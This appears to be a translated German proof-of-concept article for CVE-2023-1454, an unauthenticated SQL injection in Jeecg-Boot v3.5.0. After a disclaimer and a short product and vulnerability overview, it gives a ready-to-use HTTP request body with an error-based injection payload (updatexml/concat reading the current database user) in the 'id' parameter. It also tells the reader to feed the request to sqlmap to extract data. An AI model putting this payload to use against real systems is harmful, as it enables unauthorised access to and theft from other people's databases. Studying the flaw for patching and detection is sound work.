
CVE-2023-1454-Schwachstellenerkennungsskript
CVE-2023-1454 Schwachstellen-Erkennungsskript
Dieser Artikel dient nur zu Informationszwecken. Verwenden Sie die technischen Informationen und Werkzeuge in diesem Artikel nicht ohne Autorisierung, um Eindringversuche in Computersysteme durchzuführen. Für direkte oder indirekte Konsequenzen und Schäden, die durch die Nutzung der hier bereitgestellten Informationen entstehen, ist allein der Benutzer verantwortlich.
Einführung Jeecg-Boot ist eine Low-Code-Entwicklungsplattform auf Basis von Codegeneratoren. Sie bietet eine Reihe von Funktionen wie Codegeneratoren, Template-Engines, Berechtigungsverwaltung, Datenwörterbücher, Datenimport und -export und hilft Entwicklern, schnell Unternehmensanwendungen zu erstellen.
Schwachstellenübersicht Die Java-Low-Code-Plattform Jeecg-Boot (v3.5.0) für Webanwendungen verwendet die Datei jimureport-spring-boot-starter-1.5.6.jar. Jeecg-Boot weist einen Mangel in der Filterung von Sonderzeichen auf. Unter der Bedingung des Frontends Vue3 in Version v3.5.0 besteht in Jeecg eine nicht autorisierte SQL-Injection. Die Schwachstelle tritt auf, wenn der Pfad /querySql aufgerufen wird und die SQL beim Parameter id nicht bereinigt wird, wodurch eine direkte Fehlerinjektion möglich ist. Ein nicht authentifizierter entfernter Angreifer kann durch die Konstruktion spezieller Zeichenfolgen letztlich sensible Informationen aus der Zieldatenbank abrufen.
Betroffene Versionen Betroffene Version: Jeecg-Boot = v3.5.0
Speichern Sie das Datenpaket als txt, um die Daten mit sqlmap zu erhalten
Host: xxx.xxx.xxx
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}